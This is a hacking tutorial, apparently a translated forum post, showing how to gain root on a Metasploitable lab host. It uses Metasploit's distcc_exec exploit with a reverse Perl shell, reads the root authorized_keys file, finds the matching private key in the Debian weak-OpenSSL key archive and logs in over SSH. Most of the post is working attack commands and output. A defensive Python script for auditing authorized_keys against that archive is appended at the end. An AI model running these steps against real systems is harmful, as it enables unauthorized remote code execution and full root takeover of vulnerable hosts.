The hardest challenge for a hacker who has managed to get in over SSH is obtaining ROOT access for full exploitation. There are a great many ways to do it; this time I want to explain how to get root by making use of the RSA key obtained through the DistCC daemon (=
Requirements:
1. Metasploit Framework (metasploit.com/download)
2. ExploitDB (http://www.exploitdb.com)
3. Guessable RSA keys (read the module to get the download link)
Method:
1. Log in through DistCC as daemon
2. Find out the RSA public key used by the server
3. Log in as root using the guessable RSA key
Tutorial:
First, scan the target to understand the network map
Code:
root@blue-dragon:~# msfconsole
Search for the DistCC module
Code:
msf > search distcc
Use the module --> exploit/unix/misc/distcc_exec
Code:
msf > use exploit/unix/misc/distcc_exec
Set the target
Code:
msf exploit(distcc_exec) > set RHOST 192.168.1.8
Set the payload -> an interactive terminal shell (run "msf > show payloads" first to find out which payload modules are suitable)
Code:
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse_perl
Set the local host (the attacker's IP)
Code:
msf exploit(distcc_exec) > set LHOST 192.168.1.2
Run the exploit
Code:
msf exploit(distcc_exec) > exploit
Privilege escalation commands, with their output in the CODE blocks (=
1. uname -a
Code:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
2. whoami
Code:
daemon
3. ls -lart /root (check the root folder)
Code:
total 32
-rw-r--r-- 1 root root 141 Oct 20 2007 .profile
-rw-r--r-- 1 root root 2227 Oct 20 2007 .bashrc
-rwx------ 1 root root 401 Apr 28 2010 reset_logs.sh
-rw------- 1 root root 187 Apr 28 2010 .lesshst
drwxr-xr-x 21 root root 4096 Apr 28 2010 ..
drwxr-xr-x 3 root root 4096 May 17 2010 .
drwxr-xr-x 2 root root 4096 May 17 2010 .ssh
-rw------- 1 root root 123 Nov 13 11:32 .bash_history
4. ls -lart /root/.ssh (check the "/root/.ssh" folder --> hidden)
Code:
total 12
drwxr-xr-x 3 root root 4096 May 17 2010 ..
drwxr-xr-x 2 root root 4096 May 17 2010 .
-rw-r--r-- 1 root root 405 May 17 2010 authorized_keys
5. cat /root/.ssh/authorized_keys (view the contents of authorized_keys)
Code:
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
Note down the RSA key for use later:
Quote:AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w
Search for the vulnerability archive in ExploitDB
Code:
root@blue-dragon:/pentest/exploits/exploitdb# ./searchsploit openssl
Open the file multiple/remote/5622.txt
Code:
root@blue-dragon:/pentest/exploits/exploitdb# cat platforms//multiple/remote/5622.txt
Download the file named in the ExploitDB archive's notes
Quote:Download the RSA keys from:
http://sugar.metasploit.com/debian_ssh_r...86.tar.bz2
or
http://exploit-db.com/sploits/debian_ssh...86.tar.bz2
Extract the RSA archive, then look for the RSA key that matches the server:
Code:
root@blue-dragon:~/tools/rsa/2048# grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
Result:
Quote:57c3115d77c56390332dc5c49978627a-5429.pub
This is the file that matches the server; now connect the SSH client to the server using this RSA key
Code:
root@blue-dragon:~/tools/rsa/2048# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.8
HACKED!!!
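
For defenders, the key archive used above doubles as a blocklist: any authorized_keys entry whose fingerprint appears in it can be matched to a private key by anyone holding the archive. The script below is an added example, not part of the original post; it audits an authorized_keys file against the archive's file names. It assumes those names follow the <MD5 fingerprint>-<pid>.pub pattern seen in the result above, and its function names and the sample key builder are constructed for illustration.

```python
import base64, hashlib, re

# Assumed archive naming, as in the post: <md5 fingerprint>-<pid>.pub
NAME_RE = re.compile(r"^([0-9a-f]{32})-\d+(?:\.pub)?$")
# Key type plus base64 blob; login options may precede it, a comment may follow.
KEY_RE = re.compile(r"(?:^|\s)(ssh-rsa|ssh-dss)\s+([A-Za-z0-9+/]+={0,2})(?:\s|$)")

def load_blocklist(filenames):
    """Keep the fingerprint part of every well-formed archive file name."""
    return {m.group(1) for m in map(NAME_RE.match, filenames) if m}

def md5_fingerprint(blob):
    """Legacy OpenSSH fingerprint: MD5 over the raw key blob, without colons."""
    return hashlib.md5(blob).hexdigest()

def split_fields(blob):
    """Split length-prefixed wire fields; None if a length overruns the blob."""
    fields, off = [], 0
    while off < len(blob):
        size = int.from_bytes(blob[off:off + 4], "big")
        off += 4 + size
        if off > len(blob):
            return None
        fields.append(blob[off - size:off])
    return fields

def audit(text, blocklist):
    """Return (line number, verdict, fingerprint) for weak or damaged entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = None if line.lstrip().startswith("#") else KEY_RE.search(line)
        if not m:
            continue
        try:
            blob = base64.b64decode(m.group(2), validate=True)
        except ValueError:
            blob = b""
        fields = split_fields(blob)
        if not fields or fields[0] != m.group(1).encode():
            findings.append((lineno, "malformed", None))  # cannot be vetted
        elif md5_fingerprint(blob) in blocklist:
            findings.append((lineno, "weak", md5_fingerprint(blob)))
    return findings

def constructed_key(n):
    """Constructed ssh-rsa entry (not a real key) and its fingerprint."""
    f = lambda b: len(b).to_bytes(4, "big") + b
    blob = f(b"ssh-rsa") + f(b"\x23") + f(n.to_bytes(n.bit_length() // 8 + 1, "big"))
    return "ssh-rsa " + base64.b64encode(blob).decode() + " demo", md5_fingerprint(blob)
```

Pass load_blocklist the file names from the extracted archive directory and audit the text of each authorized_keys file on the host. Entries reported as weak should be removed and replaced with a freshly generated key pair; entries reported as malformed (for example a key split by stray whitespace) cannot be fingerprinted and need manual review.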